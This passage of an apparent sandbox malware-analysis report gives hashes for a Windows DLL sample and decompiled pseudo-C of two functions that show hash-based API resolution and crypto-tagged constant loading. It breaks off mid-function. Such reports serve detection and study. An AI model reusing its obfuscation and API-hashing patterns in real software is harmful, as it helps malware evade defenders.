Opcode ID: cf8c14402250fa0e20beea49902fcde02e1d2ad5bd8f58a66f7a3e8d675b560c
Instruction ID: 9eec36bca6d73a57bdccd103fce553fb95f96d560815c6bc2e055f43faea916a
Opcode Fuzzy Hash: cf8c14402250fa0e20beea49902fcde02e1d2ad5bd8f58a66f7a3e8d675b560c
Instruction Fuzzy Hash: A3F09E379563F4BDFA20C976AC82C129298FF50255F008C39F2C0E5140C7B18480C232

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F321494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6F321494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6F32F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v76, E6F32F4CC( &_v76) + 0x10);
				E6F32F4BC( &_v80, E6F32F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v84, E6F32F4CC(_t325) + 0x10);
				E6F32F4BC( &_v88, E6F32F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v92, E6F32F4CC(_t329) + 0x10);
				E6F32F4BC( &_v96, E6F32F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v100, E6F32F4CC(_t333) + 0x10);
				E6F32F4BC( &_v104, E6F32F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v108, E6F32F4CC(_t337) + 0x10);
				E6F32F4BC( &_v112, E6F32F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v116, E6F32F4CC(_t341) + 0x10);
				E6F32F4BC( &_v120, E6F32F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v124, E6F32F4CC(_t345) + 0x10);
				E6F32F4BC( &_v128, E6F32F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v132, E6F32F4CC(_t349) + 0x10);
				E6F32F4BC( &_v136, E6F32F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v140, E6F32F4CC(_t353) + 0x10);
				E6F32F4BC( &_v144, E6F32F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v148, E6F32F4CC(_t357) + 0x10);
				E6F32F4BC( &_v152, E6F32F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v156, E6F32F4CC(_t361) + 0x10);
				E6F32F4BC( &_v160, E6F32F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v164, E6F32F4CC(_t365) + 0x10);
				E6F32F4BC( &_v168, E6F32F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v172, E6F32F4CC(_t369) + 0x10);
				E6F32F4BC( &_v176, E6F32F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v180, E6F32F4CC(_t373) + 0x10);
				E6F32F4BC( &_v184, E6F32F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v188, E6F32F4CC(_t377) + 0x10);
				E6F32F4BC( &_v192, E6F32F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v196, E6F32F4CC(_t381) + 0x10);
				E6F32F4BC( &_v200, E6F32F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v204, E6F32F4CC(_t385) + 0x10);
				E6F32F4BC( &_v208, E6F32F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6F334200(0x60a28c5c, _t434);
				E6F32F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6F32F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6F32F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6F32F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6F32F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6F32F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6F32F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6F32F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6F32F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6F32F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6F32F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6F32F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6F32F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6F32F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6F32F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6F32F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6F32F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6F321D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6F32B27C( &_v248, _v256, _t481, _v252, _t318);
				E6F32F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v296, E6F32F4CC(_t410) + 0x10);
				E6F32F4BC( &_v300, E6F32F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v304, E6F32F4CC(_t414) + 0x10);
				E6F32F4BC( &_v308, E6F32F4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v312, E6F32F4CC(_t418) + 0x10);
				E6F32F4BC( &_v316, E6F32F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6F32F828( &_v320, E6F32F4CC(_t422) + 0x10);
				E6F32F4BC( &_v324, E6F32F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6F32B9FC(_t154,  *_t480);
				E6F32F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6F32F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6F32F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6F32F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6F32F654( &_v316);
				return E6F32F654( &_v356);
			}

0x6f321494
0x6f321498
0x6f32149d
0x6f3214a3
0x6f3214ab
0x6f3214b0
0x6f3214bc
0x6f3214c0
0x6f3214d2
0x6f3214e8
0x6f3214f3
0x6f3214f4
0x6f3214f5
0x6f3214f6
0x6f3214f7
0x6f3214fa
0x6f3214fe
0x6f321502
0x6f321509
0x6f32151b
0x6f321531
0x6f32153c
0x6f32153d
0x6f32153e
0x6f32153f
0x6f321540
0x6f321543
0x6f321547
0x6f32154b
0x6f321552
0x6f321564
0x6f32157a
0x6f321585
0x6f321586
0x6f321587
0x6f321588
0x6f321589
0x6f32158c
0x6f321590
0x6f321594
0x6f32159b
0x6f3215ad
0x6f3215c3
0x6f3215ce
0x6f3215cf
0x6f3215d0
0x6f3215d1
0x6f3215d2
0x6f3215d5
0x6f3215d9
0x6f3215dd
0x6f3215e4
0x6f3215f6
0x6f32160c
0x6f321617
0x6f321618
0x6f321619
0x6f32161a
0x6f32161b
0x6f32161e
0x6f321622
0x6f321626
0x6f32162d
0x6f32163f
0x6f321655
0x6f321660
0x6f321661
0x6f321662
0x6f321663
0x6f321664
0x6f321667
0x6f32166b
0x6f32166f
0x6f321676
0x6f321688
0x6f32169e
0x6f3216a9
0x6f3216aa
0x6f3216ab
0x6f3216ac
0x6f3216ad
0x6f3216b0
0x6f3216b4
0x6f3216b8
0x6f3216bf
0x6f3216d1
0x6f3216e7
0x6f3216f2
0x6f3216f3
0x6f3216f4
0x6f3216f5
0x6f3216f6
0x6f3216f9
0x6f3216fd
0x6f321701
0x6f321708
0x6f32171a
0x6f321730
0x6f32173b
0x6f32173c
0x6f32173d
0x6f32173e
0x6f32173f
0x6f321742
0x6f321746
0x6f32174a
0x6f321751
0x6f321763
0x6f321779
0x6f321784
0x6f321785
0x6f321786
0x6f321787
0x6f321788
0x6f32178b
0x6f32178f
0x6f321793
0x6f32179a
0x6f3217ac
0x6f3217c2
0x6f3217cd
0x6f3217ce
0x6f3217cf
0x6f3217d0
0x6f3217d1
0x6f3217d4
0x6f3217d8
0x6f3217dc
0x6f3217e3
0x6f3217f5
0x6f32180b
0x6f321816
0x6f321817
0x6f321818
0x6f321819
0x6f32181a
0x6f32181d
0x6f321821
0x6f321825
0x6f32182c
0x6f32183e
0x6f321854
0x6f32185f
0x6f321860
0x6f321861
0x6f321862
0x6f321863
0x6f321866
0x6f32186a
0x6f32186e
0x6f321875
0x6f321887
0x6f32189d
0x6f3218a8
0x6f3218a9
0x6f3218aa
0x6f3218ab
0x6f3218ac
0x6f3218af
0x6f3218b3
0x6f3218b7
0x6f3218be
0x6f3218d0
0x6f3218e6
0x6f3218f1
0x6f3218f2
0x6f3218f3
0x6f3218f4
0x6f3218f5
0x6f3218f8
0x6f3218fc
0x6f321900
0x6f321907
0x6f321919
0x6f32192f
0x6f32193a
0x6f32193b
0x6f32193c
0x6f32193d
0x6f32193e
0x6f321941
0x6f321945
0x6f321949
0x6f321950
0x6f321962
0x6f321978
0x6f321983
0x6f321984
0x6f321985
0x6f321986
0x6f32198c
0x6f32198f
0x6f321991
0x6f32199c
0x6f3219a3
0x6f3219ac
0x6f3219b4
0x6f3219bb
0x6f3219c4
0x6f3219cc
0x6f3219d3
0x6f3219dc
0x6f3219e4
0x6f3219eb
0x6f3219f4
0x6f3219fc
0x6f321a03
0x6f321a0c
0x6f321a14
0x6f321a1b
0x6f321a24
0x6f321a2c
0x6f321a36
0x6f321a3f
0x6f321a47
0x6f321a51
0x6f321a5a
0x6f321a62
0x6f321a6c
0x6f321a75
0x6f321a7d
0x6f321a87
0x6f321a90
0x6f321a98
0x6f321aa2
0x6f321aab
0x6f321ab3
0x6f321abd
0x6f321ac6
0x6f321ace
0x6f321ad8
0x6f321ae1
0x6f321ae9
0x6f321af3
0x6f321afc
0x6f321b04
0x6f321b0e
0x6f321b17
0x6f321b1f
0x6f321b26
0x6f321b2f
0x6f321b37
0x6f321b3e
0x6f321b43
0x6f321b51
0x6f321b55
0x6f321b64
0x6f321b6d
0x6f321b72
0x6f321b79
0x6f321b7d
0x6f321b81
0x6f321b88
0x6f321b9a
0x6f321bb0
0x6f321bbb
0x6f321bbc
0x6f321bbd
0x6f321bbe
0x6f321bbf
0x6f321bc2
0x6f321bc6
0x6f321bca
0x6f321bd1
0x6f321be3
0x6f321bf9
0x6f321c04
0x6f321c05
0x6f321c06
0x6f321c07
0x6f321c08
0x6f321c0b
0x6f321c0f
0x6f321c13
0x6f321c1a
0x6f321c2c
0x6f321c42
0x6f321c4d
0x6f321c4e
0x6f321c4f
0x6f321c50
0x6f321c51
0x6f321c54
0x6f321c58
0x6f321c5c
0x6f321c63
0x6f321c75
0x6f321c8b
0x6f321c96
0x6f321c97
0x6f321c98
0x6f321c99
0x6f321c9a
0x6f321c9d
0x6f321ca0
0x6f321ca1
0x6f321ca2
0x6f321ca9
0x6f321cac
0x6f321cb7
0x6f321cbe
0x6f321cc7
0x6f321ccf
0x6f321cd6
0x6f321cdf
0x6f321ce7
0x6f321cee
0x6f321cf7
0x6f321cff
0x6f321d04
0x6f321d0d
0x6f321d15
0x6f321d2a

Strings

8nsK, xrefs: 6F321900

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction ID: 6605e02a327b25188b3d2df5bcaf8ad3c9604507fd959e74c441e76282423d3e
Opcode Fuzzy Hash: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction Fuzzy Hash: 773255725147069AC705DF30C8519AFB7E0EFA1308F104B1DB5C96A1E2FFB1EA8AD691

Uniqueness

Uniqueness Score: -1.00%

Function 6F32A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6F32A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6F32B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6F32F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6F32F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6F332234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6F32F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6F32F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6F32F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6f33b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6F333064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6F32F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6F32F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6F32B5C4(_t439 + 0x34);
											E6F32B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6F32B5C4(_t439 + 0x34);
										E6F32B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6F32F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6F32CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6F32C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6F32F828(_t439 + 0x14, E6F32F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6F32F4BC(_t439 + 0x14, E6F32F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6F333064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6F32F828(_t439 + 0x40, E6F32F4CC(_t439 + 0x3c) + 4);
											 *(E6F32F4BC(_t439 + 0x40, E6F32F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6F32CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6F32F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6F32F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6F32AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6F32CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6F32F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6F32F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6F32F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6F32F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6F32F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6F3338F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6F32F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6F32F828( *((intOrPtr*)(_t439 + 8)), E6F32F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6F32F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6F32F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6F32F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6F32F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6F3338F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6F32F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6F32F828( *((intOrPtr*)(_t439 + 4)), E6F32F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6F32F828( *((intOrPtr*)(_t439 + 8)), E6F32F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6F32F4BC( *((intOrPtr*)(_t439 + 8)), E6F32F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6F32F828( *((intOrPtr*)(_t439 + 4)), E6F32F4CC( *_t439) + 4);
								 *(E6F32F4BC( *((intOrPtr*)(_t439 + 4)), E6F32F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
